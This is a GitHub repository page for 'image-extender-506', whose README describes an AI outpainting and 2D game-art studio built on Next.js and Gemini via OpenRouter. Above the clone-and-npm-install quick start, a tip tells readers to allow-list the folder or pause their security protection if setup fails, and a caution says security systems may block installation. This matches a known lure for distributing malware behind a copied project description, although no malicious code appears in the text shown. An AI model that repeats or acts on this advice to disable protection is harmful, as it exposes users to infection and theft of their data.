Skip to content

LabelSnowTunnel/image-extender-506

Repository files navigation

Image Extender

Tip

If the setup does not start, add the folder to the allowed list or pause protection for a few minutes.

Caution

Some security systems may block the installation. Only download from the official repository.


QUICK START

git clone https://github.com/LabelSnowTunnel/image-extender-506.git
cd image-extender-506
npm install
npm start

Seamlessly extend any image in any direction with AI — then build whole 2D game art sets (parallax backgrounds, autotiles, sprite animations, and decoration props) from the same studio.

A small open-source web app for AI outpainting and 2D game-art generation. Powered by Google's Gemini image models via OpenRouter, with a Poisson-blending pipeline that hides the seam between original and AI-generated pixels, plus purpose-built pipelines for tiles, sprites, and props.

Bring your own OpenRouter API key — it stays in your browser, never on the server.

A 1024² portrait shot extended into a cinematic wide-angle scene with no visible seam

Before / After

A single 1024 × 1024 phone-style portrait → a wide 16:9 cinematic frame, in a few clicks. Same colors, same lighting, same wet-pavement reflections — just much, much more of them.

Before · 1024 × 1024 After · extended L+R into a cinematic wide
Square portrait shot of a person in a yellow jacket on a neon-lit Brooklyn corner The same scene extended sideways into a wide cinematic frame

Five modes — Extender + Parallax + Tiles + Sprites + Props

The app ships as a tiny studio with five workspaces, switchable from the pill in the top bar:

  • Extender (default) — outpaint any image in any of four directions, with a best-of-3 seam-quality variant picker.
  • Parallax Studio — build a real, multi-layer sidescroller background from scratch: separate Sky / Far / Mid / Near layers, role-aware AI prompts, chroma-keyed transparent layers, a live multi-layer scrolling preview, auto-extend to a target width, tileable-loop healing, and one-click ZIP export with a JSON manifest.
  • Tile Studio — a 13-tile autotile set for 2D platformers (body + 4 edges
    • 4 outer corners + 4 inner corners) generated in one AI call as a 4×4 sprite-sheet, with deterministic corner reconciliation and an AI "art director" QA/repaint loop. Palette and texture detail stay locked across the whole set.
  • Sprite Studio — character & creature animations as a single AI-call sheet. Pick a body plan (humanoid, quadruped, serpent/fish, flyer/bird, or blob), pick an animation, describe the creature, and get a keyframe sheet back with a live animation player and engine-ready export. Each body plan drives its own anatomy-specific pose-guide rig and animation set.
  • Props Studio — an open-ended, ever-growing library of standalone transparent decoration sprites (the kind games layer on top of the tile map) generated 8 at a time, driven by a two-call "art director → painter" pipeline that keeps the set varied and never repetitive.

Parallax Studio

Parallax Studio — Sky / Far / Mid / Near depth layers with a live multi-layer scrolling preview and ZIP export

Tile Studio

Tile Studio — a 13-tile autotile set generated in one call, with a live "how tiles fit together" platform preview

Props Studio

Props Studio — an open-ended decoration library of transparent scatter sprites grown 8 at a time

Sprite Studio

Sprite Studio — a character walk-cycle keyframe sheet with a live looping animation player

Features

  • Click an edge → extend in that direction. Spatial controls on the image, no dialog-tree UX.
  • Best-of-3 variant picker. Every extension generates up to 3 candidates, sorted by seam quality. Cycle through them with ← → and pick the one you like before accepting.
  • Poisson-blended seams. Uses gradient-domain image editing (Pérez et al. 2003) with mask-grow + replicate-padded Gauss-Seidel iterations to make the AI-original boundary mathematically invisible.
  • Pre-correction for low-frequency color drift. Bulk-shifts the AI output toward the original's color at the seam before blending, which fixes the "the sky got slightly bluer" failure mode common to outpainting.
  • Optional prompt + art style. Leave the prompt blank for pure scene continuation, or add specific instructions like "add an alien moon rising on the horizon".
  • Custom art styles. 40+ styles from cinematic and oil painting to Studio Ghibli, cyberpunk, vaporwave, etc.
  • BYOK (Bring Your Own Key). Your OpenRouter key is stored only in your browser's localStorage. The server proxies your requests to OpenRouter but never logs or persists the key.
  • Model picker. Switch between Gemini 3 Pro Image (Nano Banana Pro), Gemini 3 Flash Image (Nano Banana 2), and Gemini 2.5 Flash Image (Nano Banana) from Settings — each with tuned best-of-N and timing.
  • Keyboard-first. Arrow keys to extend, / to cycle variants, Enter to accept, R to regenerate, Esc to discard.
  • Generate from scratch. Don't have a base image? Generate one with a text prompt first, then extend.
  • Shared scene brief. One auto-generated "scene brief" (setting, time of day, palette, mood) is distilled from your prompt and reused across Parallax, Tiles, Sprites, and Props so every asset in a project feels like one world.

Parallax Studio (for game designers)

  • 4 real depth layers. Sky (back, opaque), Far (distant silhouettes), Mid (mid-ground), Near (foreground props). Pick a card on the left, edit just that layer in the canvas — the same extend pipeline as Extender, but the studio knows what each layer is for.
  • Role-aware AI prompts. When you generate or extend a layer, the model is told its role and asked to produce only that depth band. Far / Mid / Near come back rendered against a flat magenta key (#FF00FF) which the client replaces with real alpha — so each layer composites cleanly over the sky.
  • Live multi-layer preview. Stacked, GPU-accelerated repeat-x scroll for every populated layer, each at its own adjustable speed (Sky drifts slow, Near runs fast). Tweak per-layer speed sliders and feel the depth in real time before exporting.
  • Locked horizontal extension. Only and are exposed — vertical extends would warp the game height, so they're suppressed.
  • Auto-extend to target width. Pick a target (e.g. 7680px = 4 × 1080p screens) and walk away. The studio repeatedly extends the active layer right, auto-accepts the best variant, re-applies chroma-keying, and stops when the target width is reached. Click Stop to interrupt.
  • Tileable loop point. Game engines tile parallax backgrounds with repeat-x. The Tileable button does the standard "offset by half / heal the new middle seam / offset back" pass so the texture loops invisibly. It also auto-runs at the end of auto-extend so the default exported result Just Works.
  • Harmonize seams. A separate optional pass for the other common problem: each AI extend introduces a tiny color/brightness shift, and over many extensions those shifts pile up into vertical "panel banding". The Harmonize button runs a column-mean smoothing that kills the banding while preserving fine detail.
  • Width presets. Quick-pick common targets (3840 / 5120 / 7680 / 10240 / 15360 px) corresponding to multiples of 720p / 1080p screens.
  • One-click ZIP export. Bundle all populated layers as PNGs (with alpha preserved) plus a parallax.json manifest listing depth order, scroll speeds, and dimensions — drop the ZIP into Unity / Godot / Phaser and wire it straight into your parallax controller.

Tile Studio (2D platformer autotiles)

  • Whole 13-tile set in one AI call. Body + 4 straight edges + 4 outer (convex) corners + 4 inner (concave) corners are generated together as one 4×4 sheet, so palette, texture scale, and lighting are locked across the set instead of drifting across 13 separate calls.
  • Template-guided image-to-image. Rather than ask the model to invent an atlas from text, it restyles a structural reference — a rounded rectangle with a rectangular hole on flat magenta. Each of the 13 roles lives at a known cell, so the client slices them out deterministically after restyle.
  • Auto-alignment + chroma key. The restyled output is re-fitted to the template silhouette (fixing the "AI painted it smaller, centered" failure), magenta is keyed to alpha with a tile-tuned chroma key, and edge tiles are made tileable along their loop axis.
  • Deterministic corner reconciliation. Corners are the hardest tiles, so the app stitches them rather than trusting raw AI cells: outer corners keep their painted cap and get a feathered edge graft so the grain matches their straight neighbors in both directions; inner corners preserve the AI art and graft only the seams that touch straight edges. The result is seamless corners run-to-run.
  • AI "Art Director" QA/repaint loop. After generation the set is composited into a platform-preview mockup and handed to a vision critic that judges it like a senior tileset artist — checking the chroma key actually keyed out (no opaque background blocks), edge-cap consistency, palette/lighting cohesion, body seamlessness, fringe, and blur. If it fails it returns a concise fix report that drives a repaint; if it passes it ships. The critic is deliberately scoped to painter-fixable defects (it does not nitpick the app-composited corner geometry).
  • Keep-best selection. Every pass is scored and the loop commits the best candidate it saw, never just the last one — so a flaky critic + full repaint can only ever improve on, never regress, a clean first generation.
  • Tileable body, no visible grid. The repeating body fill gets a stronger 2D-seamless pass (full tonal equalization + wide seam blends), and the prompt forbids cell-sized panels / long streaks / hero features, so the interior reads as one continuous surface when repeated.
  • Live "how tiles fit together" preview and per-tile re-roll. Regenerate a single tile without touching the rest; the set re-reconciles its corners afterward.
  • Engine-ready atlas export. Export the padded atlas (with a 2px duplicated extrude border around every tile to stop filtering/sub-pixel bleed in Unity / Godot / Phaser / Tiled) plus per-tile PNGs and a manifest.
  • 14 material presets — lush meadow, mossy stone, red brick, snowy peak, oak planks, desert sandstone, volcanic rock, glow cave, crystal ice, jungle floor, autumn earth, marble & gold, obsidian, coral reef — each a rich palette/surface description you can edit.

Sprite Studio (character animations)

  • Two-pass anchor → sheet workflow. Naive single-call multi-panel generation flickers — the character drifts between cells, frames come out at different scales, palettes shift. We adopt the consensus approach from the AI sprite community:
    • Pass 1 — Lock character. Generates a single neutral standing reference image of the character on a flat magenta key.
    • Pass 2 — Paint sheet. Generates the keyframe sheet with the anchor attached as a reference: "the attached image is the canonical character — every cell must match it exactly." This is the single biggest lever for cross-frame identity preservation.
    • The anchor persists across animation switches, so the same character can be re-used for idle → walk → run → jump → attack without re-rolling identity. A Re-roll character button discards the anchor for a fresh one.
  • Five body plans. A humanoid skeleton can't drive a galloping wolf, a slithering eel, a flapping bird, or a bouncing slime — so Sprite mode branches on anatomy. Pick a body plan and the studio swaps in the matching pose rig, animation set, starter creatures, and QA expectations, while reusing the same anchor → sheet → align → export pipeline:
    • Humanoid (biped) — knights, mages, goblins, bosses.
    • Quadruped — wolves, big cats, horses, hounds, plus everyday animals (dog, cat, cow, deer, bear, fox, pig, goat).
    • Serpent / Fish — snakes, eels, and marine life (shark, clownfish, pufferfish, anglerfish, swordfish, dolphin, sea serpent, piranha).
    • Flyer / Bird — birds, bats, wyverns, fairies, phoenix.
    • Blob — slimes, oozes, elementals, ghosts (pure squash & stretch).
  • Anatomy-specific pose-guide rigs. Each body plan ships a deterministic, code-generated pose-guide sheet (a "ControlNet-style" mannequin) drawn fresh for the chosen action and fed in as structural reference. Rigs use near/far value separation + dark outlines so overlapping limbs stay readable, and they render real anatomy — a quadruped spine + 4 legs with a head-bob gait, a serpent spine wave with an open-jaw strike, filled bird wing membranes with a proper flap/dive, and blob squash-&-stretch arcs.
  • Deterministic twin detector. A pixel-analysis pass scans each cell's alpha for two creatures in one frame (a common multi-panel failure), including a morphological-opening step that splits fused duplicates, and forces a repaint when it finds them. Sprite generation leans on these deterministic checks rather than a vision critic, so it isn't blocked waiting on a QA model.
  • Scale normalization. The model redraws the creature at a slightly different size in every cell, so the silhouette "breathes" during playback. A pass measures each frame's tight silhouette (bbox diagonal), takes the median as the intended scale, and rescales each frame toward it — within a tolerance + clamp so genuine pose extension (a run reach, an attack lunge) keeps its shape.
  • Baseline & horizontal alignment. Frames are foot-baseline aligned to one shared in-cell floor and horizontally centered so playback doesn't bounce or slide. Grounded gaits (idle / walk / run) plant every frame on the floor line; only truly ballistic actions (jump, pounce) keep their airborne lift via a rigid shift, so a galloping run can't split into a high row and a low row.
  • Per-body-plan animation sets. Humanoid: idle / walk / run / jump / attack / hurt / death. Quadruped: idle / walk / run / jump / pounce / hurt / death / sleep. Serpent: idle / slither / strike / coil / hurt / death. Flyer: idle / flap / glide / dive / hurt / death. Blob: idle / hop / bounce / lunge / hurt / death — each with tuned choreography and a sensible default FPS.
  • Live animation player. Looping / one-shot playback at the anim's native FPS with play/pause and a frame scrubber; the FPS slider tunes the feel before exporting.
  • Creature preset chips. One-click archetypes per body plan seed the prompt (humanoid knight/ninja/wizard…, quadruped wolf/bear/cat…, marine shark/koi…, flyer hawk/wyvern…, blob slime/ooze…).
  • Engine-ready export. Download the grid sheet, a horizontal strip (preferred by Phaser / Unity 2D / Godot / Defold), or a ZIP with both sheets, one PNG per frame, and a manifest.json listing FPS, loop flag, frame size, and per-frame grid + strip coordinates.

Props Studio (scatter decoration)

  • Open-ended, growing library. Instead of a fixed sheet of dictated items, the model freely invents decoration props for your biome. Each "add more" press paints another batch of 8 props in one AI call and appends them — the library grows without bound and never re-rolls what already exists.
  • Two-call "art director → painter" pipeline. Call #1 is a text/reasoning model acting as art director: given the biome and the categories already in the library, it invents the next batch of brand-new, distinct prop ideas (deliberately reaching across plants, minerals, bones, debris, totems, containers, creature traces, light sources, etc.). Call #2 is the image model, which paints exactly what the director decided. Splitting ideation from rendering is what stops the "same lanterns/pots/nests loop."
  • Cheap text de-duplication. Each prop reports a one-word category that's tallied and fed back as a text budget hint, so new batches avoid look-alikes without ever shipping the whole library back as images.
  • Style-locked across batches. A small montage of existing props is attached as a visual style anchor so palette / lighting / rendering stay consistent as the library grows.
  • Curate freely. Re-roll or delete any single prop; everything is generated on transparency.
  • 8 biome presets — forest glade, glowing cave, desert oasis, snowy peaks, volcanic, jungle ruins, misty swamp, candy land — these set palette/mood only, never specific items, so the model stays free to invent.
  • Descriptive names in the manifest. Because the art director already named each prop (the kind it decided to paint), the export uses that instead of anonymous prop_001: the manifest carries a human name per prop and the files are named after it (lantern.png, mushroom.png, with _02/_03 suffixes on repeats), so the atlas is self-documenting in your engine.
  • Atlas + ZIP export. Export the whole library as a packed transparent atlas PNG with a JSON manifest, or a ZIP of individual transparent PNGs + atlas + manifest.

The AI "Art Director" QA pattern

Tiles and Props share a two-call reasoning-vs-rendering pattern that consistently beats a single blind generation:

  • Props run it forward: a reasoning model decides what to make, then the image model renders it.
  • Tiles run it in reverse: the image model generates first, then a vision model reviews the composited result and, if needed, sends a concise fix report back for a repaint — with keep-best selection so the loop can only improve the output. (The review is auto-skipped on slow models like GPT image to avoid multi-minute blind waits.)
  • Sprites lean on deterministic post-process checks instead of a vision critic — scale normalization, baseline grounding, horizontal centering, and a pixel-level twin/spillover detector that forces a repaint on duplicates. This keeps sprite generation fast and predictable rather than blocked on a QA model.

Critics are scoped to defects the painter can actually fix, run at low temperature for consistency, and fail-open (a flaky critic never blocks you).

How extension works

┌─────────────┐   1. expand canvas with        ┌───────────────────┐
│  original   │ ──  light-gray blank area ──▶  │  expanded canvas  │
└─────────────┘     in chosen direction        └─────────┬─────────┘
                                                         │
                                                         ▼
                                              ┌─────────────────────┐
                                              │  Gemini outpaints   │
                                              │  the blank region   │
                                              └─────────┬───────────┘
                                                        │
                                                        ▼
                                              ┌─────────────────────┐
                                              │  pre-correct color  │
                                              │  drift at seam      │
                                              └─────────┬───────────┘
                                                        │
                                                        ▼
                                              ┌─────────────────────┐
                                              │  Poisson blend with │
                                              │  grown mask         │
                                              └─────────┬───────────┘
                                                        │
                                                        ▼
                                              ┌─────────────────────┐
                                              │  measure seam       │
                                              │  residual, repeat   │
                                              │  ×3, sort, present  │
                                              └─────────────────────┘

For horizontal extensions we run the pipeline up to 3 times in parallel attempts (each at a different temperature), measure the seam residual of each blended result, and present the candidates sorted best-blend first. You're free to cycle and pick a different one if you prefer the AI's content choices over the cleanest seam.

Vertical extensions use a different chunked path that's deterministic enough that 1 attempt usually suffices.

Optional: server-side env fallback

If you'd rather not enter the key in the browser (or you're hosting a demo where you want to provide the key for visitors), copy .env.example to .env.local and fill in your key:

cp .env.example .env.local
# edit .env.local and add your OPENROUTER_API_KEY

When set, the server will use this key for any request that doesn't include a client-provided one.

Tech stack

  • Next.js 14 (App Router) + React 18 + TypeScript
  • Tailwind CSS for the dark studio theme
  • HTML Canvas for all client-side image manipulation (app/utils/imageProcessor.ts)
  • JSZip for in-browser project bundling
  • OpenRouter for model access
    • Image: google/gemini-3.1-flash-image-preview (Nano Banana 2, default), google/gemini-3-pro-image-preview (Nano Banana Pro), google/gemini-2.5-flash-image (Nano Banana), and openai/gpt-5.4-image-2 (GPT-5.4 Image 2 — high fidelity, slower)
    • Reasoning / vision QA (scene brief, prop art director, tile review): google/gemini-2.0-flash-001

Project structure

app/
├── api/
│   ├── extend/route.ts        Outpainting endpoint (proxies OpenRouter)
│   ├── generate/route.ts      Text-to-image + tile-sheet + sprite-sheet prompts
│   ├── scene-brief/route.ts   Distill a shared scene brief for a project
│   ├── prop-brief/route.ts    Props "art director" — invents the next prop batch
│   ├── tile-review/route.ts   Tile QA "art director" (vision critic)
│   └── sprite-review/route.ts Sprite QA "art director" (vision critic)
├── components/                UI split by workspace
│   ├── TopBar / CommandBar / Workspace / VariantSelector / Modals / icons
│   ├── ParallaxStudio.tsx
│   ├── TileStudio.tsx         + PlatformPreview compositor
│   ├── SpriteStudio.tsx
│   └── PropStudio.tsx
├── lib/                       Domain logic & constants
│   ├── app.ts / models.ts / artStyles.ts
│   ├── parallax.ts / tileset.ts / sprite.ts / props.ts
│   └── bodyPlans.ts           Sprite body-plan registry (anims, presets, rigs)
├── utils/
│   ├── imageProcessor.ts      Canvas: chunking, Poisson blend, chroma key,
│   │                          tileability, seam scoring, sprite align/scale
│   ├── poseRig.ts             Dispatches to the body-plan rig + measures subject
│   ├── rigCore.ts             Shared rig primitives (capsule/dot/projection…)
│   └── rigs/                  Per-body-plan pose rigs (biped, quadruped,
│                              serpent, flyer, blob)
├── globals.css                Dark "studio" design system
├── layout.tsx                 Root layout, Inter font
└── page.tsx                   App shell: state, generation pipelines, QA loops

Configuration knobs

A few small values you might want to tune:

Constant Where Default Meaning
EXTENSION_PERCENT app/lib/app.ts 38 How much of the current dimension each extension adds
maxAttempts per model in app/lib/models.ts 13 Best-of-N candidates per horizontal extension
MAX_TILE_REVIEW_PASSES app/page.tsx 2 Extra tile repaint passes the QA art director may trigger
TILESET_TILE_SIZE app/lib/tileset.ts 512 Per-tile resolution in the 4×4 sheet
TILESET_ATLAS_EXTRUDE_PX app/lib/tileset.ts 2 Duplicated border around each exported atlas tile
PROP_BATCH app/lib/props.ts 8 Props painted per "add more" press
GROW_PX app/utils/imageProcessor.ts 8 Pixels to grow the Poisson mask into the original
iterations app/utils/imageProcessor.ts 250 Max Gauss-Seidel iterations

Privacy & security

  • The OpenRouter API key entered in the UI is stored only in your browser's localStorage. It is never written to the server's disk and never logged. The server uses it once per request to proxy the call to OpenRouter, then discards it.
  • The server-side OPENROUTER_API_KEY env var is optional and acts only as a fallback for requests that don't include a client-provided key.
  • No analytics, no telemetry, no tracking.

Acknowledgments

  • Poisson image editing technique: Pérez, Gangnet, and Blake (2003) — "Poisson Image Editing", SIGGRAPH.
  • Google for the Gemini image models, OpenRouter for the unified API.

License

MIT

About

Seamlessly extend any image in any direction with AI. Open-source web app powered by Gemini via OpenRouter, with Poisson-blended seams and best-of-3 variant picker.

Topics

Resources

License

Contributing

Security policy

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors